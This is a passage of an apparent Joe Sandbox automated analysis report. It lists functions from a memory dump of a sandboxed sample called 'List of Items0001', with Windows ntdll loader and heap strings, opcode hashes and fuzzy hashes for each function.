                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.h2
                                                • API String ID: 0-3823411657
                                                • Opcode ID: 329207771ea2c8359197c0b9b0702b2e8adc0b799d7ac490541b91d1f3c9211d
                                                • Instruction ID: 9fab64c9c5cd564bbb7bccf6547f1bb6f1ec080b880af1f4d6630e033f69b78e
                                                • Opcode Fuzzy Hash: 329207771ea2c8359197c0b9b0702b2e8adc0b799d7ac490541b91d1f3c9211d
                                                • Instruction Fuzzy Hash: BAF14BB6D01218EFDB15DF98C9A0ADEBBB8EF48750F51416AE501E7210EB709E01CBA5
                                                Function 3267B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: eb571a0cea0564fa6bc5a62a99e536c9ac08180078ff9f1d8115352c8365c5a6
                                                • Instruction ID: f432d9c186a5f396d134049f2181d00bf37e2b8b7be7678de15dd894ca119758
                                                • Opcode Fuzzy Hash: eb571a0cea0564fa6bc5a62a99e536c9ac08180078ff9f1d8115352c8365c5a6
                                                • Instruction Fuzzy Hash: 50C16774A01355ABEB198B68E8D0BBEB7A1EF45318F50416DEC11EB290EFB4CC84C391
                                                Function 3269631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 84d74101ff92d2d1d0b558c6b01f3a6f7b834a145c4735dcc8f265377cecc04a
                                                • Instruction ID: 2645c9f4d26e1834ece003e5d31ed6bc4f214211b50f43670015b93360bb8b90
                                                • Opcode Fuzzy Hash: 84d74101ff92d2d1d0b558c6b01f3a6f7b834a145c4735dcc8f265377cecc04a
                                                • Instruction Fuzzy Hash: 41914771A42399DBF728CF54C944BDEBBA0BF41B68F600469E9156B280DFB05C42CF96
                                                Function 32670680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: d6dcf75f8dd47dd2d6d6bbd1c09640750ecdd082f1d43d534c2a71a5643be7b3
                                                • Instruction ID: 739b245ea7a9698346e6441dbb8a0222d499297436a030901e8237b1e56be039
                                                • Opcode Fuzzy Hash: d6dcf75f8dd47dd2d6d6bbd1c09640750ecdd082f1d43d534c2a71a5643be7b3
                                                • Instruction Fuzzy Hash: EFF1AF74A00B45DFEB09CF68D894B6AB7B5FF84344F204199E8169B381DB74E981CFA1
                                                Function 32689723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-2283098728
                                                • Opcode ID: 823e33f06cabf38ddb6031437f65e29b2357bcb4e700d3c0f1c37bf459435984
                                                • Instruction ID: 54a342fd134c9905c95b44bc58bfe226ec22cfaf6ca0b53ef46bf117d24237f6
                                                • Opcode Fuzzy Hash: 823e33f06cabf38ddb6031437f65e29b2357bcb4e700d3c0f1c37bf459435984
                                                • Instruction Fuzzy Hash: 675125717027029FE714DF38C884B1AB7A1BF84314F240E6DE9529B791EB70E845CB96
                                                Function 3269C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 326D80E9
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326D80F3
                                                • Failed to reallocate the system dirs string !, xrefs: 326D80E2
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1783798831
                                                • Opcode ID: 0fd1821d9b5bf9d051ed9b647e989b695064cba0c03aa9f80771f5b04f548e3b
                                                • Instruction ID: 3dae273bd6cddf26352945151a6d44d1fe432ffe4f7c3d32745c5de0b831fa2c
                                                • Opcode Fuzzy Hash: 0fd1821d9b5bf9d051ed9b647e989b695064cba0c03aa9f80771f5b04f548e3b
                                                • Instruction Fuzzy Hash: A641E2B5542300ABD720EF64DC44B8BB7E8FF89760F20592AF848A7250EF70D841CB96
                                                Function 326E43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 326E4519
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 326E4508
                                                • LdrpCheckRedirection, xrefs: 326E450F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 727aed1912e9c61724e01686f8fa230b7d0aa31d068c1c3a38f487645f55d17c
                                                • Instruction ID: 1e0d739f0d451b79cfa3177bd52a4a8d3d3ac2965c3f5f13fad7ecf67b0734fd
                                                • Opcode Fuzzy Hash: 727aed1912e9c61724e01686f8fa230b7d0aa31d068c1c3a38f487645f55d17c
                                                • Instruction Fuzzy Hash: D041E176706311DBEB15CF78CA40A16B7E4FF88794F060A59EC8AEB251DB30D800CB92
                                                Function 32657662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: 5120cb16dc7c884d209f3300ed2d8ff1df517b41f2861b160934bf46403dd1dc
                                                • Instruction ID: 6ae50950db1dc571adc1d62f169a71fbcffc10aa000155cf54afa9db33793f59
                                                • Opcode Fuzzy Hash: 5120cb16dc7c884d209f3300ed2d8ff1df517b41f2861b160934bf46403dd1dc
                                                • Instruction Fuzzy Hash: 09012037016180AEF30B872AD859F467BA8EF42734F38449EE040475E1CFB59C40DA55
                                                Function 32660485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32660586
                                                • kLsE, xrefs: 326605FE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 3446177414-2547482624
                                                • Opcode ID: 7ad002b6c719d4277a58573f187c657d83b10d11d1bfd37d0c9399d0b903d12e
                                                • Instruction ID: dc4d17feb6a21f9a5e456375391f2d6ff6cf4b0d99e942dbe552b94a10b3d9c3
                                                • Opcode Fuzzy Hash: 7ad002b6c719d4277a58573f187c657d83b10d11d1bfd37d0c9399d0b903d12e
                                                • Instruction Fuzzy Hash: F7518DB5A00B46DFEB28DFA5C5407BAB7F4BF44308F10883ED99597240EB749545CBA2
                                                Function 3266A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: e5cc01752ea8c9b038fda801bcc8a409bb1ecedca96b9b142f4a7cb8d28eebfd
                                                • Instruction ID: 7ba20058def59581808fe16870b9fd50199ae3ff79d36e9488ea3c894db216ec
                                                • Opcode Fuzzy Hash: e5cc01752ea8c9b038fda801bcc8a409bb1ecedca96b9b142f4a7cb8d28eebfd
                                                • Instruction Fuzzy Hash: 1AC16974208382CBE319CF58C940B6AB7E4FF85748F00496AF8959B650EB74DD45CB96
                                                Function 32698322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3269847E
                                                • LdrpInitializeProcess, xrefs: 32698342
                                                • minkernel\ntdll\ldrinit.c, xrefs: 32698341
                                                • @, xrefs: 326984B1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: c08a311d55911739311a0d3573067b6a919dd6f7e4ab8962900322f00d7eacc0
                                                • Instruction ID: d9f11b90dd93ad0fc7f96d51a73c64a853a1e033dc2d77dbd4c23600d157ce42
                                                • Opcode Fuzzy Hash: c08a311d55911739311a0d3573067b6a919dd6f7e4ab8962900322f00d7eacc0
                                                • Instruction Fuzzy Hash: 82919DB1549384AFE721CF60D850FEBB7ECAF84784F40092EFA8592151EB74D944CB66
                                                Function 3269265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 326D20C0
                                                • SXS: %s() passed the empty activation context, xrefs: 326D1FE8
                                                • .Local, xrefs: 326927F8
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 326D1FE3, 326D20BB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: ff7491f92b145e64b911ee287b6d4cd2b9d236caf4927d01528e5071e374b2b1
                                                • Instruction ID: 063d21f5b1867bc24a2eb49eb83b4c87ee1e7aaa2bfe9562b2fccda85caf7da7
                                                • Opcode Fuzzy Hash: ff7491f92b145e64b911ee287b6d4cd2b9d236caf4927d01528e5071e374b2b1
                                                • Instruction Fuzzy Hash: BDA1BC7590132D9BDB24CF64CD88BD9B3B1BF58318F5001EAD80AAB256DB709E85CF91
                                                Function 326F327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}d2
                                                • API String ID: 0-1634993941
                                                • Opcode ID: 2fb45cf4f19d832c9a9cf5e22fb2c1a80fd7150cfcd7d1ef00aed4e4f32c4ccc
                                                • Instruction ID: f4a6a35a8b7bed0ad109ce2afbd847213f90d49f87fce36efc7bfb3753e5542c
                                                • Opcode Fuzzy Hash: 2fb45cf4f19d832c9a9cf5e22fb2c1a80fd7150cfcd7d1ef00aed4e4f32c4ccc
                                                • Instruction Fuzzy Hash: AF818DB6608380AFEB15CB14C840B6AB7E8FFC4754F400929F9819B290DB76DD14CB66
                                                Function 3266B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LUc2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-1490623326
                                                • Opcode ID: 0a291c90459fd4eac15c3d191938f8b56749c5d19bfd8c4634cd85a04b9f85fb
                                                • Instruction ID: fadd89655c572e273d7ad2d8c6e6d79cba3b2d49900d482fff69ad11864193e5
                                                • Opcode Fuzzy Hash: 0a291c90459fd4eac15c3d191938f8b56749c5d19bfd8c4634cd85a04b9f85fb
                                                • Instruction Fuzzy Hash: E691DFB5A05369CBEB15CF54D5807EEB7B0FF44368F644199E810BB290DB789A80CB92
                                                Function 326663CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 326C0E72
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 326C0DEC
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 326C0E2F
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 326C0EB5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 6c9405787edf74df6b2cce6cc448fe4811be7b31688b33e328457782bae47bff
                                                • Instruction ID: 2d78fbd74a42d5db94ae1edfa6257fdb09f867c48bd57c5f0ac85146cfde6ab9
                                                • Opcode Fuzzy Hash: 6c9405787edf74df6b2cce6cc448fe4811be7b31688b33e328457782bae47bff
                                                • Instruction Fuzzy Hash: 887101B19043049FD750DF14D884B9B7FA8EF857A8F404468FD488B68AD778E588CBD2
                                                Function 326590F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 810d2d7cc952683bb83f24dba21ff99f4d64ea96969f93edc0c54b5e6107f3ef
                                                • Instruction ID: 191c1d7859889160dbaa50409fb2a716ac3ec826ee7c0ce26ee9a2fac34ec47f
                                                • Opcode Fuzzy Hash: 810d2d7cc952683bb83f24dba21ff99f4d64ea96969f93edc0c54b5e6107f3ef
                                                • Instruction Fuzzy Hash: ED31D336901214EFDF12CB55CC84F9AB7B8FF45770F2440A9E915AB291DB70E940CBA1
                                                Function 326A1190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ei2
                                                • API String ID: 0-2652838342
                                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                • Instruction ID: cf4101d9b4d57b0f07c7d13f4b1e974fc785eec3d27d37b95915fd72f246f50f
                                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                • Instruction Fuzzy Hash: 8B31A2B290021DBBDB11CB94CC60EDEBBBDEF84B54F004065E915A7260DB74DE45CB94
                                                Function 32667072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: d25394c8e4641c549a19af3e6b7ef1d63079088886b30bff21b83e7775a7d623
                                                • Instruction ID: 68d3d41ee66fdd0639c9f7396d7407061141e186fbfafd470870f07fc9acfcc4
                                                • Opcode Fuzzy Hash: d25394c8e4641c549a19af3e6b7ef1d63079088886b30bff21b83e7775a7d623
                                                • Instruction Fuzzy Hash: 945133B4A00715EFEB0ADF64C8447ADB7B0FF44719F2041AAE90297290DF749911CBD1
                                                Function 326F3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                • API String ID: 0-1168191160
                                                • Opcode ID: 79390eae5738379c302807da1559bc0409db40b155571d493b72db6fe3009dc1
                                                • Instruction ID: 40c27112660a3372c2156aa9201fb7be841adc449c66c3eb8d55e94a2d3c814f
                                                • Opcode Fuzzy Hash: 79390eae5738379c302807da1559bc0409db40b155571d493b72db6fe3009dc1
                                                • Instruction Fuzzy Hash: 9CF19EB5A002A89BDF24CF18CC90BD9B3B5EF84744F5040E9DA09A7240EB729ED5CF59
                                                Function 32661380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32661648
                                                • HEAP[%wZ]: , xrefs: 32661632
                                                • HEAP: , xrefs: 326614B6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: f7b0311ff4f7dcbc9f501c455b340d5c9ed346242dee6137c951d9570a5f8409
                                                • Instruction ID: 46463f3a9db6f2fbdb94a74c3a506a84683d8b01c3c3c40b39463b25bd59f2f2
                                                • Opcode Fuzzy Hash: f7b0311ff4f7dcbc9f501c455b340d5c9ed346242dee6137c951d9570a5f8409
                                                • Instruction Fuzzy Hash: 6CE1EFB4A043459BEB19CF69C49077ABBE5AF48708F24889DE8D6CB345EB34E941CB50
                                                Function 3268F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 326D00F1
                                                • RTL: Re-Waiting, xrefs: 326D0128
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 326D00C7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 6c4db3b66542feec966ddeb944b287fb59ceced3dae8bf1d3221456dc644621f
                                                • Instruction ID: 90ba1ed08f92fec4bc49cec19a780c612a508a5d210f4d7c50e19a0e1a54a6c5
                                                • Opcode Fuzzy Hash: 6c4db3b66542feec966ddeb944b287fb59ceced3dae8bf1d3221456dc644621f
                                                • Instruction Fuzzy Hash: 5FE1ACB46087419FE725CF28C880B1AB7E4FF85368F600A59F5A58B2E1DB74D944CB53
                                                Function 326E330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: 4f6f5bb803fbaf122be83528930d800207675818e6ab5058f965d02c8cd1626d
                                                • Instruction ID: 3f2dc3752b036e08778a9cf85c3e0059f13d0668761d13d5fd336a4a7b340a29
                                                • Opcode Fuzzy Hash: 4f6f5bb803fbaf122be83528930d800207675818e6ab5058f965d02c8cd1626d
                                                • Instruction Fuzzy Hash: 4CB1C2B1606341AFE311CF64CA80F67B7E8BF84754F501929FA429B250DBB0EC54CB96
                                                Function 3265A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
